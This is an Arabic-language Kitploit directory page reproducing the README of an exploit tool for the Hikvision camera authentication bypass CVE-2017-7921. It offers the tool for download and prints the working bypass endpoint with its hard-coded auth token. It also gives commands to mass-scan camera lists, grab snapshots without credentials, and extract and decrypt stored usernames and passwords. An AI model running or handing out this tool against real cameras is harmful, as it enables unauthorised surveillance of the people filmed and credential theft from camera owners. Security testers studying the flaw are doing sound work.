Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2017-7921 — HikVision Auth Bypass CVE، الأداة قادرة على استخراج بيانات الاعتماد، والتقاط لقطات شاشة بناءً على الكوكيز السحرية (magic cookie) أو بيانات الاعتماد المقدَّمة. | Kitploit
أدوات/GitHubGitHub/mverschu/cve-2017-7921
الاستطلاعأمان إنترنت الأشياءهجمات كلمات المرورتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتالمصادقة
GitHubmverschu/cve-2017-7921

CVE-2017-7921

HikVision Auth Bypass CVE، الأداة قادرة على استخراج بيانات الاعتماد، والتقاط لقطات شاشة بناءً على الكوكيز السحرية (magic cookie) أو بيانات الاعتماد المقدَّمة.

عرض المستودع
1منذ 7 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

أداة سرد كاميرات Hikvision والتقاط اللقطات

أداة مستقلة لسرد كاميرات Hikvision من ملف والتقاط لقطة من كل كاميرا باستخدام بيانات اعتماد صالحة (مصادقة HTTP Basic أو Digest) أو تجاوز مصادقة CVE. مصممة للعمل على مضيف آخر بغرض الاختبار.

الميزات

  • سرد الكاميرات من ملف نصي (كل سطر يحتوي host أو host:port).
  • الفحص (CVE) – اختبار كل كاميرا بحثًا عن ثغرة تجاوز المصادقة السحرية CVE (بدون بيانات اعتماد)؛ مع خيار --save-snapshot للأجهزة المتأثرة.
  • بيانات الاعتماد – استخراج اسم المستخدم/كلمة المرور من كل كاميرا عبر CVE (مصادقة سحرية + فك تشفير الإعدادات). يتطلب OpenSSL.
  • التحقق من المصادقة – التحقق من أن اسم المستخدم/كلمة المرور مقبولة من كل كاميرا (بدون حفظ لقطات).
  • التقاط جميع اللقطات – جلب صورة واحدة من كل كاميرا (بيانات اعتماد صالحة، أو --exploit لاستخدام تجاوز CVE بدون بيانات اعتماد).
  • طلبات متزامنة (عدد عمال قابل للضبط).
  • مصادقة HTTP Digest اختيارية؛ وخيار --merge لإنشاء صورة مجمعة واحدة. المتطلبات: requests، Pillow (لـ --merge).

المتطلبات

  • Python 3.8+
  • requests

التثبيت

root@kitploit:~
pip install -r requirements.txt

ملف قائمة الكاميرات

أنشئ ملفًا نصيًا يحتوي كاميرا واحدة في كل سطر. الأسطر التي تبدأ بـ # يتم تجاهلها.

root@kitploit:~
# Example cameras.txt
192.168.1.100
192.168.1.101:80
nvr.local:8080

الاستخدام

سرد الكاميرات

طباعة الكاميرات المقروءة من الملف (لا حاجة لبيانات اعتماد).

root@kitploit:~
python hikvision_snapshots.py cameras.txt list

فحص إمكانية الوصول اختياري (HTTP GET لكل مضيف):

root@kitploit:~
python hikvision_snapshots.py cameras.txt list -v

الفحص (CVE)

اختبار كل كاميرا بحثًا عن CVE تجاوز مصادقة اللقطات في Hikvision. لا تتطلب أي بيانات اعتماد.

root@kitploit:~
python hikvision_snapshots.py cameras.txt check

حفظ اللقطات للكاميرات المتأثرة فقط:

root@kitploit:~
python hikvision_snapshots.py cameras.txt check --save-snapshot -o ./vuln_snapshots

الخيارات: --timeout، --workers، -o (لـ --save-snapshot).

بيانات الاعتماد (استخراج)

استخراج بيانات الاعتماد من كل كاميرا عبر CVE (مصادقة سحرية لجلب قائمة المستخدمين وملف الإعدادات، ثم فك تشفير الإعدادات). يتطلب OpenSSL على المضيف. لا حاجة لبيانات اعتماد للتشغيل.

root@kitploit:~
python hikvision_snapshots.py cameras.txt credentials

الخيارات: --timeout، --workers.

التحقق من المصادقة

تحقق من أن بيانات اعتمادك تعمل على كل كاميرا (يستخدم نفس نقاط نهاية اللقطات؛ لا يحفظ الصور).

root@kitploit:~
python hikvision_snapshots.py cameras.txt auth-check -u admin -p YourPassword

الخيارات: --timeout، --workers، --digest (نفس خيارات اللقطة).

التقاط لقطات جميع الكاميرات

التقاط لقطة واحدة لكل كاميرا وحفظها بصيغة JPEG. استخدم إما بيانات اعتماد صالحة أو --exploit (تجاوز مصادقة CVE بدون بيانات اعتماد).

root@kitploit:~
# With credentials
python hikvision_snapshots.py cameras.txt snapshot -u admin -p YourPassword

# With CVE exploit (no credentials)
python hikvision_snapshots.py cameras.txt snapshot --exploit
  • يتم حفظ اللقطات في مجلد snapshots/ افتراضيًا (استخدم -o للتغيير).
  • أسماء الملفات مشتقة من host أو host_port (مثل 192_168_1_100.jpg، nvr_local_8080.jpg).

الخيارات:

عند استخدام --merge، بعد حفظ كل لقطة تقوم الأداة بإنشاء صورة شبكية واحدة (overview.jpg) في مجلد الإخراج تحتوي على خلية واحدة لكل كاميرا مع تسمية. يتطلب Pillow (pip install Pillow).

مثال مع مجلد إخراج مخصص ومصادقة Digest:

root@kitploit:~
python hikvision_snapshots.py cameras.txt snapshot -u admin -p secret -o ./images --digest --timeout 20

مثال مع صورة مجمعة:

root@kitploit:~
python hikvision_snapshots.py cameras.txt snapshot -u admin -p YourPassword --merge
# or with exploit (no creds):
python hikvision_snapshots.py cameras.txt snapshot --exploit --merge -o ./out

نقاط النهاية

لقطة موثقة (مع بيانات الاعتماد): يحاول السكربت بالترتيب – /ISAPI/Streaming/channels/1/picture، /ISAPI/Streaming/channels/101/picture، /onvif-http/snapshot.

CVE (check / --exploit): /onvif-http/snapshot?auth=YWRtaW46MTEK (تجاوز مصادقة سحري بدون بيانات اعتماد).

التشغيل على مضيف آخر

  1. انسخ hikvision_snapshots.py وrequirements.txt وملف قائمة الكاميرات إلى المضيف.
  2. ثبّت: pip install -r requirements.txt
  3. شغّل list للتحقق من الملف؛ واستخدم check لفحص CVE، أو auth-check للتحقق من بيانات الاعتماد، أو snapshot (مع -u/-p أو --exploit).

تأكد من أن المضيف لديه وصول شبكي إلى جميع عناوين IP ومنافذ الكاميرات.

تنزيل الأداة
الخيارالوصفالافتراضي
-u, --usernameاسم مستخدم الكاميرامطلوب ما لم يُستخدم --exploit
-p, --passwordكلمة مرور الكاميرامطلوب ما لم يُستخدم --exploit
--exploitاستخدام تجاوز المصادقة السحرية CVE (بدون بيانات اعتماد)off
-o, --output-dirمجلد حفظ صور اللقطاتsnapshots
--timeoutمهلة HTTP بالثواني15
--workersعدد طلبات اللقطات المتزامنة10
--digestاستخدام مصادقة HTTP Digest بدلاً من Basicoff
--mergeدمج جميع اللقطات في صورة مجمعة واحدةoff
--merge-columnsأعمدة الشبكة للدمج (الافتراضي: auto)auto